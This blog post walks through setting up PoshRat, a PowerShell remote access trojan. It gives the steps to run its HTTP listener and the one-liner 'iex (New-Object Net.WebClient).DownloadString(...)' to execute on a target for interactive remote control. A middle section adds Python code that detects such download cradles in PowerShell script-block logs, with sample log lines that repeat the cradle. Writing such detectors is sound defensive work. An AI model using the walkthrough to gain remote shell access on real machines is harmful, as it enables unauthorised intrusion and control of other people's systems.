Powershell Remote Access Trojan – PoshRat

I’ve been going through @nikhil_mitt‘s 5-part blog series on Powershell Shells. It’s beautifully and meticulously laid out and covers:

Day 1 – Interactive PowerShell shells over TCP
Day 2 – Interactive PowerShell shells over UDP
Day 3 – Interactive PowerShell shells over HTTP/HTTPS
Day 4 – Interactive PowerShell shells with WMI
Day 5 – Interactive PowerShell shells over ICMP and DNS

Nikhil is the author of the offensive-security PowerShell tools Nishang and Kautilya, and his blog post series is ideal if you want to roll up your sleeves and play with these tools manually, rather than as part of a framework. I find this strategy helps me see under the hood and really get to grips with the code itself.

Having arrived at day three, I was excited that Nikhil was covering @subTee‘s PoshRat, a Remote Access Trojan written purely in PowerShell.

I played with the HTTP Reverse Shell and, although I struggled to set this up, it turned out after talking with @nikhil_mitt and @subTee that I’d simply been over-thinking it. It couldn’t be simpler or more elegant:

Download PoshRatHTTP.ps1 on your server and be sure to adjust your execution policy in an elevated PowerShell console to allow for script execution.

Change line 12 of the code:

$Server = '127.0.0.1'

to the IP address of your “listening” machine.

Run the script. It creates an HTTP listener that delivers the code to the target when the target connects.

Next, make the connection from the target machine in PowerShell:

iex (New-Object Net.WebClient).DownloadString("http://server/connect")

And you have interactive PowerShell control.
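From the defender’s side, the interesting part of that sequence is the one-liner on the target: a download cradle that fetches a script over HTTP and hands it straight to Invoke-Expression (iex). With PowerShell script block logging enabled (Event ID 4104), that exact text lands in the event log. The following is an added example written for this post, not code from PoshRat or from Nikhil’s or @subTee’s repositories; it classifies constructed 4104-style log lines, flagging a block as a “cradle” only when a fetch primitive and an execution primitive appear together, so an ordinary Invoke-WebRequest on its own is not reported. The log lines, hostnames and addresses in it are made up for the example.

```python
"""Flag PowerShell download cradles (fetch + Invoke-Expression in one script block)
in script-block-logging text. Added example for this post; not part of PoshRat."""
import re
from typing import List, Optional, Dict

# Constructed lines in the shape of Event ID 4104 "ScriptBlockText" fields.
# None of these were captured from a real host.
SAMPLE_EVENTS = [
    'ScriptBlockText: iex (New-Object Net.WebClient).DownloadString("http://server/connect")',
    "ScriptBlockText: Get-ChildItem C:\\Users | Sort-Object Length",
    "ScriptBlockText: (New-Object Net.WebClient).DownloadString('https://example.test/a.ps1') | Invoke-Expression",
    "ScriptBlockText: $r = Invoke-WebRequest -Uri https://updates.example.test/version.txt; $r.Content",
    "ScriptBlockText: IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('http://10.0.0.5/connect')",
]

# Execution primitive: Invoke-Expression or its alias iex, as a whole word.
EXEC_RE = re.compile(r"\b(invoke-expression|iex)\b", re.IGNORECASE)
# Fetch primitives commonly paired with it. Matched case-insensitively because
# PowerShell itself is case-insensitive, as the upper-cased sample shows.
FETCH_RE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-restmethod)",
    re.IGNORECASE,
)
# First http(s) URL in the block; stops at whitespace, quotes or a closing paren.
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def classify(script_text: str) -> Optional[str]:
    """'cradle' = fetch and execute in the same block, 'fetch' = download only, None = neither."""
    has_exec = EXEC_RE.search(script_text) is not None
    has_fetch = FETCH_RE.search(script_text) is not None
    if has_exec and has_fetch:
        return "cradle"
    if has_fetch:
        return "fetch"
    return None


def extract_url(script_text: str) -> Optional[str]:
    """Return the first URL in the block (the server the cradle pulled from), if any."""
    m = URL_RE.search(script_text)
    return m.group(0) if m else None


def scan(events: List[str]) -> List[Dict[str, Optional[str]]]:
    """Run classify() over log lines; return one finding per cradle, in input order."""
    findings = []
    for line in events:
        # Strip the field label; the remainder is the script block as logged.
        text = line.split("ScriptBlockText:", 1)[-1].strip()
        if classify(text) == "cradle":
            findings.append({"url": extract_url(text), "text": text})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"cradle -> {f['url']}: {f['text']}")
```

The split between classify() and extract_url() is deliberate: the verdict does not depend on a URL being present (a cradle that builds its URL from variables still has both primitives), while the URL, when it is there, gives the responder the host to pivot on. Feeding the real 4104 ScriptBlockText field in place of SAMPLE_EVENTS is the only change needed to run this over an export.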

Beautiful.

There are other ways to deliver the code to the target that I haven’t investigated yet. There is also an HTTPS version that allows for encrypted communication, changes firewall rules and even adds a security certificate!

@nikhil_mitt has extended this with Invoke-PoshRatHttps, which simplifies the process.

I’d encourage you to hop over to Nikhil’s blog post series where there are instructions, images and videos.

Enjoy. I am.